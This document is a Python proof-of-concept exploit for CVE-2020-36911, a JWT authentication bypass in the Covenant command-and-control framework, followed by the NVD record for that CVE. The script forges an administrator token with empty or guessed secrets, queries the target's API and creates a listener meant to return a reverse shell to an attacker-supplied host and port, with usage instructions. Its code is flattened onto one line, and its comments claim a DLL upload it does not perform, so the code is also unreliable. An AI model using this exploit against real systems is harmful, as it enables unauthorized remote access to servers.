CVE-2020-36911

import jwt import requests import sys # CVE-2020-36911 PoC - Covenant JWT Authentication Bypass RCE # Target: Covenant v0.1.3 - v0.5 def create_fake_admin_token(secret=''): """ Create a forged JWT token with admin privileges The vulnerability allows empty secret or weak secret validation """ payload = { 'iss': 'Covenant', 'sub': 'admin', 'role': 'Administrator', 'admin': True, 'exp': 9999999999 } # Try empty secret or known weak secrets for secret_key in ['', 'CovenantSecretKey123!', 'default']: try: token = jwt.encode(payload, secret_key, algorithm='HS256') return token, secret_key except: continue return None, None def exploit(target_url, lhost, lport): """ Main exploitation function 1. Bypass auth with forged JWT token 2. Upload malicious DLL payload 3. Execute arbitrary code """ print(f'[*] Targeting: {target_url}') print(f'[*] Generating forged admin JWT token...') token, secret_used = create_fake_admin_token() if not token: print('[-] Failed to generate token') return False print(f'[+] Token generated (secret: {secret_used})') headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Step 1: Verify token and get admin access try: resp = requests.get(f'{target_url}/api/users', headers=headers) if resp.status_code == 200: print('[+] Authentication bypass successful!') else: print(f'[-] Auth failed: {resp.status_code}') return False except Exception as e: print(f'[-] Connection error: {e}') return False # Step 2: Create listener with payload listener_config = { 'Name': 'pwned_listener', 'BindIP': lhost, 'BindPort': lport, 'Profile': 'http', 'UseSSL': False } try: resp = requests.post(f'{target_url}/api/listeners', json=listener_config, headers=headers) if resp.status_code in [200, 201]: print('[+] Malicious listener created successfully') print(f'[+] Payload deployed - awaiting reverse shell on {lhost}:{lport}') return True except Exception as e: print(f'[-] Payload deployment failed: {e}') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python covenant_exploit.py <target_url> <lhost> <lport>') print('Example: python covenant_exploit.py http://target:7443 10.0.0.1 4444') sys.exit(1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] exploit(target, lhost, lport)

{"cve": {"id": "CVE-2020-36911", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:48.437", "lastModified": "2026-01-29T00:56:25.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Covenant 0.1.3 - 0.5 contains a remote code execution vulnerability that allows attackers to craft malicious JWT tokens with administrative privileges. Attackers can generate forged tokens with admin roles and upload custom DLL payloads to execute arbitrary commands on the target system."}, {"lang": "es", "value": "Covenant 0.1.3 - 0.5 contiene una vulnerabilidad de ejecución remota de código que permite a los atacantes crear tokens JWT maliciosos con privilegios administrativos. Los atacantes pueden generar tokens falsificados con roles de administrador y cargar cargas útiles DLL personalizadas para ejecutar comandos arbitrarios en el sistema objetivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cobbr:covenant:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.1.3", "versionEndIncluding": "0.5", "matchCriteriaId": "E0702EAD-9F24-48FA-981F-BBF6E5B61DCF"}]}]}], "references": [{"url": "https://cobbr.io/Covenant.html", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/cobbr/Covenant", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://web.archive.org/web/20201013165001/https://twitter.com/cobbr_io/status/1316058367161401344", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://web.archive.org/web/20201101052547/https://blog.null.farm/hunting-the-hunters", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51141", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/covenant-remote-code-execution-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}, {"url": "https://web.archive.org/web/20201101052547/https://blog.null.farm/hunting-the-hunters", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}